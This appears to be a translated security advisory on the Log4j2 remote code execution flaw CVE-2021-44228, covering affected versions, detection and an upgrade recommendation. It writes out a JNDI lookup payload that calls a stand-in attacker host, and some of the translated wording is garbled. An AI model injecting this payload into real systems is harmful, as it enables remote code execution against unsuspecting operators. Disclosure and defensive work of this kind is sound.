In addition, the leader of the knownsec 404 team (ZoomEye & SeeBug) “Brother Black” also recommends setting log4j2.formatMsgNoLookups arrive real.
Initially, the vulnerability is new, so there is no CVE to track it.But now we have CVE-2021-44228 Used for remote code injection in Log4j. Since the PoC has been released, it is very suitable to exploit this vulnerability.The payload for exploiting the vulnerability is
${jndi:ldap://attacker.com/a} (Attacker.com is the server controlled by the attacker)
A few hours ago, an Apache Log4j2 remote code execution vulnerability appeared on the Internet. An attacker can use this vulnerability to construct a special data request packet, which eventually triggers remote code execution. Due to the wide scope of the vulnerability, it is recommended that users investigate related vulnerabilities in a timely manner.
According to the analysis of the White Hat Security Research Institute, many popular systems on the market are currently affected. Almost all technology giants are victims of this Log4j remote code execution vulnerability.
Vulnerability description
Apache Log4j2 is a Java-based logging tool. This tool rewrites the Log4j framework and introduces many rich features. The log framework is widely used in business system development to record log information.
In most cases, developers may write error messages caused by user input to the log. Attackers can use this feature to construct special data request packets through this vulnerability, and ultimately trigger remote code execution.
On November 24, 2021, the Alibaba Cloud security team officially reported the Apache Log4j2 remote code execution vulnerability to Apache. As part of Apache Log4j2’s functions have recursive analysis functions, attackers can directly construct malicious requests to trigger remote code execution vulnerabilities.
No special configuration is required to exploit the vulnerability. After verification by the Alibaba Cloud security team, Apache Struts2, Apache Solr, Apache Druid, Apache Flink, etc. are all affected.
Alibaba Cloud Emergency Response Center reminds Apache Log4j2 users to take security measures as soon as possible to prevent vulnerability attacks.
Vulnerability level: severe (serious)
Affected version
2.0 <= Apache log4j2 <= 2.14.1
Impact judgment method: The user only needs to check whether the Java application has introduced two jars, log4j-api and log4j-core. If there are applications in use, it is likely to be affected.
Mitigation measures for Log4j vulnerabilities
Currently Vulfocus has integrated the Log4j2 environment. You can start environmental testing through the following link:
https://ift.tt/3rYAjV9
We strongly recommend using The latest version Log4j2 also upgrades known affected applications and components, such as srping-boot-strater-log4j2/Apache Solr/Apache Flink/Apache Druid.
renew:
What could be worse than this? A few hours later, the PoC for the Log4j vulnerability was published on the Internet.
Check Proof of concept here.
